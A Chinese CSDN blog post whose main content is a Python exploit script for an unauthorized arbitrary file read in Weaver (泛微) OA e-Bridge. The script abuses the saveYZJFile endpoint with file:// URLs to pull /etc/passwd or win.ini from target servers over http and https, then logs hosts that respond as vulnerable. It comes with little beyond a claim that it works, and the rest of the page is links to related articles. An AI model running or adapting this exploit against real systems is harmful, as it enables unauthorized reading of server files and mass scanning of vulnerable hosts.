Python实现泛微OA云桥未授权任意文件读取

最新推荐文章于 2023-11-05 02:03:11 发布
最新推荐文章于 2023-11-05 02:03:11 发布
阅读量609 收藏 3
点赞数 1
文章标签: python json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34652083/article/details/111471297
版权

 1.代码如下:

import requests
import json
from multiprocessing import Pool, Manager

def two(host,id,dirstr):
    s=requests.get(url=host+'/file/fileNoLogin/'+id,verify=False, timeout=5)
    if ('/bin/bash' in s.text and 'root' in s.text) or 'bit' in s.text:
        print(s.text)
        save=open('e-Bridge.txt','a+')
        save.write(host+' '+dirstr+'\n')
        save.close()
def one(h,p):
    dirstr=('/etc/passwd','/C:\Windows\win.ini')
    for i in dirstr:
        host = h +':' + p
        try:
            if p=='':
                host = h +':80'
            s=requests.get(url='http://'+host+'/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://'+i+'&fileExt=txt',verify=False, timeout=5)
            data = json.loads(s.text)
            print('http://'+host,data['id'])
            two('http://'+host,data['id'],i)
        except:
            pass
        try:
            if p=='':
                host = h +':443'
            s1=requests.get(url='https://'+host+'/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file://'+i+'&fileExt=txt',verify=False, timeout=5)
            data = json.loads(s1.text)
            print('https://'+host,data['id'])
            two('https://'+host,data['id'],i)
        except:
            pass


if __name__ == '__main__':
    one('xxxx.xxx.com','80')

2.测试结果完好

 

标题

 

1want0
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
泛微云桥 e-Bridge 任意文件读取.md
04-11
泛微云桥 e-Bridge 任意文件读取
泛微OA服务器获取 token
最新发布
小松鼠的博客
03-08 1081
泛微 OA 封装 java 接口获取 token
基于Python的Webservice开发(四)-泛微OA的SOAP接口
weixin_30670965的博客
01-27 1438
一、功能需求 泛微e-cology可以在流程中调用Webservice接口实现与其他系统的联动等复杂功能。但是目前泛微文档中仅提供了调用的方法,但是没有关于接口的相关开发信息。 本次案例是用Python开发一个泛微e-cology 可以调用的Webservice接口。 二、所需要的库 pip install spyne 对于Python3 pip install spyne=...
webservice python开发接口_基于Python的Webservice开发(四)-泛微OA的SOAP接口
weixin_39692623的博客
01-30 323
一、功能需求泛微e-cology可以在流程中调用Webservice接口实现与其他系统的联动等复杂功能。但是目前泛微文档中仅提供了调用的方法,但是没有关于接口的相关开发信息。本次案例是用Python开发一个泛微e-cology 可以调用的Webservice接口。二、所需要的库pip install spyne对于Python3pip install spyne==2.13.4a1三、代码实现fr...
泛微OA发送邮件【E8、E9】
jackleeonlyone的博客
12-30 3112
泛微发送邮件
泛微OA获取流程附件地址,发送邮件或上传到第三方系统中
清浅
03-25 3910
泛微的流程开发当中,有些流程的数据、附件要上传到其它平台,与其它平台相互集成对接,一般是在写Action事件时,就会自动把数据及附件上传到其它平台,以下内容是经过正常使用获取流程附件的业务提示:以下是本篇文章正文内容,下面案例可供参考文件上传到第三方分系统可修改发送邮件出代码通过FTP上传到对应文件保存地址,生成数据库记录即可实现附件同步。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
Silentsoul04#vulnerability-paper-1#泛微OA9前台任意文件上传1
07-25
泛微OA9前台任意文件上传漏洞位于: /page/exportImport/uploadOperation.jsp文件中Jsp流程大概是:判断请求是否是mult
泛微OA ECOLOGY 授权生成器
07-25
泛微OA ECOLOGY8.X系列 授权生成器,直接导入授权文件,支持最新的版本
泛微OA前端开发接口方法和自定义方方法总结注释
06-16
泛微OA前端开发接口方法和自定义方方法总结注释 适用于刚接触泛微OA前端开发的小白和不了解泛微OA开发的老手 有什么问题可以私信问我 前端代码开发方式 方式1:模板上代码块,针对单个节点,在显示/打印/移动模板...
通达OA自动登陆代码(Python3版)
10-28
1:基于通达OA2011网络智能办公系统制作 2:python安装环境为python3以上版本
泛微E-cology9.0(EC9)官方后台全套操作手册
09-29
泛微E-cology9.0(EC9)官方后台全套操作手册,包含20几个文档,WORD格式。注意这是操作手册,不是二次开发手册。适合系统操作人员阅读。
2021-泛微OA V8 SQL注入漏洞
热门推荐
weixin_43227251的博客
04-13 1万+
泛微OA V8 SQL注入漏洞 漏洞描述 泛微OA V8 存在SQL注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限 漏洞影响 泛微OA V8 FOFA app=“泛微-协同办公OA” 漏洞复现 在getdata.jsp中,直接将request对象交给 weaver.hrm.common.AjaxManager.getData(HttpServletRequest, ServletContext) : 方法处理 在getData方法中,判断请求里cmd参数是否为空,如果不为空,调用proc方法 P
E-Office(泛微OA)前台任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-05 972
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。officeserver.php文件存在任意文件读取漏洞,通过漏洞可以下载服务器上的任意文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
泛微oa服务器文件,泛微OA根据文档的docid查询文档附件存放的路径
weixin_39534780的博客
08-12 1838
注意看下面两个链接http://127.0.0.1/docs/docs/DocDspExt.jsp?id=40369http://127.0.0.1/docs/docs/DocDsp.jsp?id=41353DocDspExt.jsp地址的文档才会把附件存放到/WEAVER/ecology/filesystem目录下。DocDsp.jsp地址的文档是网页形式的文档,直接插入到数据库,没有附件存放到...
泛微OA集成Wps-V5版本,获取授权相关数据
qq_31614535的博客
05-25 1170
wpsV5版本查看授权时间 1、访问开放平台,登录wpsadmin 账号 2、 访问 wps服务部署地址+/open/api/docs_mid_third/app/info 获取超管的appid、appsercet 3、将获取到的参数配置到oa中,配置文件 ecology\WEB-INF\prop\doc_wps_for_weaver.properties doccenter_manage_appKey=AK2021 doccenter_manage_sercetKey=0af0 4、将刚...
泛微OAwebservice接口附件上传
StrivingSRC的博客
03-26 1409
requestName>工单升级</requestName>
调用泛微OA接口的一些基本常识
没有故事的博主
11-02 9528
1、传输部门、人员等字段时,要先调用HrmService接口中getUserId("workcode", "E0000003")、departmentid("departmentcode", "50000342") 方法获取OA中部门、人员的id值,这样可以直接传输到表单的人力资源、部门字段中; 2、由于表单版本可能升级,初始提供的workflowid不能满足升级的需求,人为修改太过于不灵活,可以调用泛微HrmService接口中getCurrentWorkflowId(初始workflowid)获取最新
泛微oa服务器文件,泛微OA根据文档的docid直接读取文件
05-24
如果您想通过泛微OA的API来获取文件流,可以按照以下步骤进行操作: 1. 使用API获取文档信息,其中包括文档的docid和下载地址url。 2. 使用HTTP GET请求下载地址url,获取文件流。 以下是示例代码,供您参考: `...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值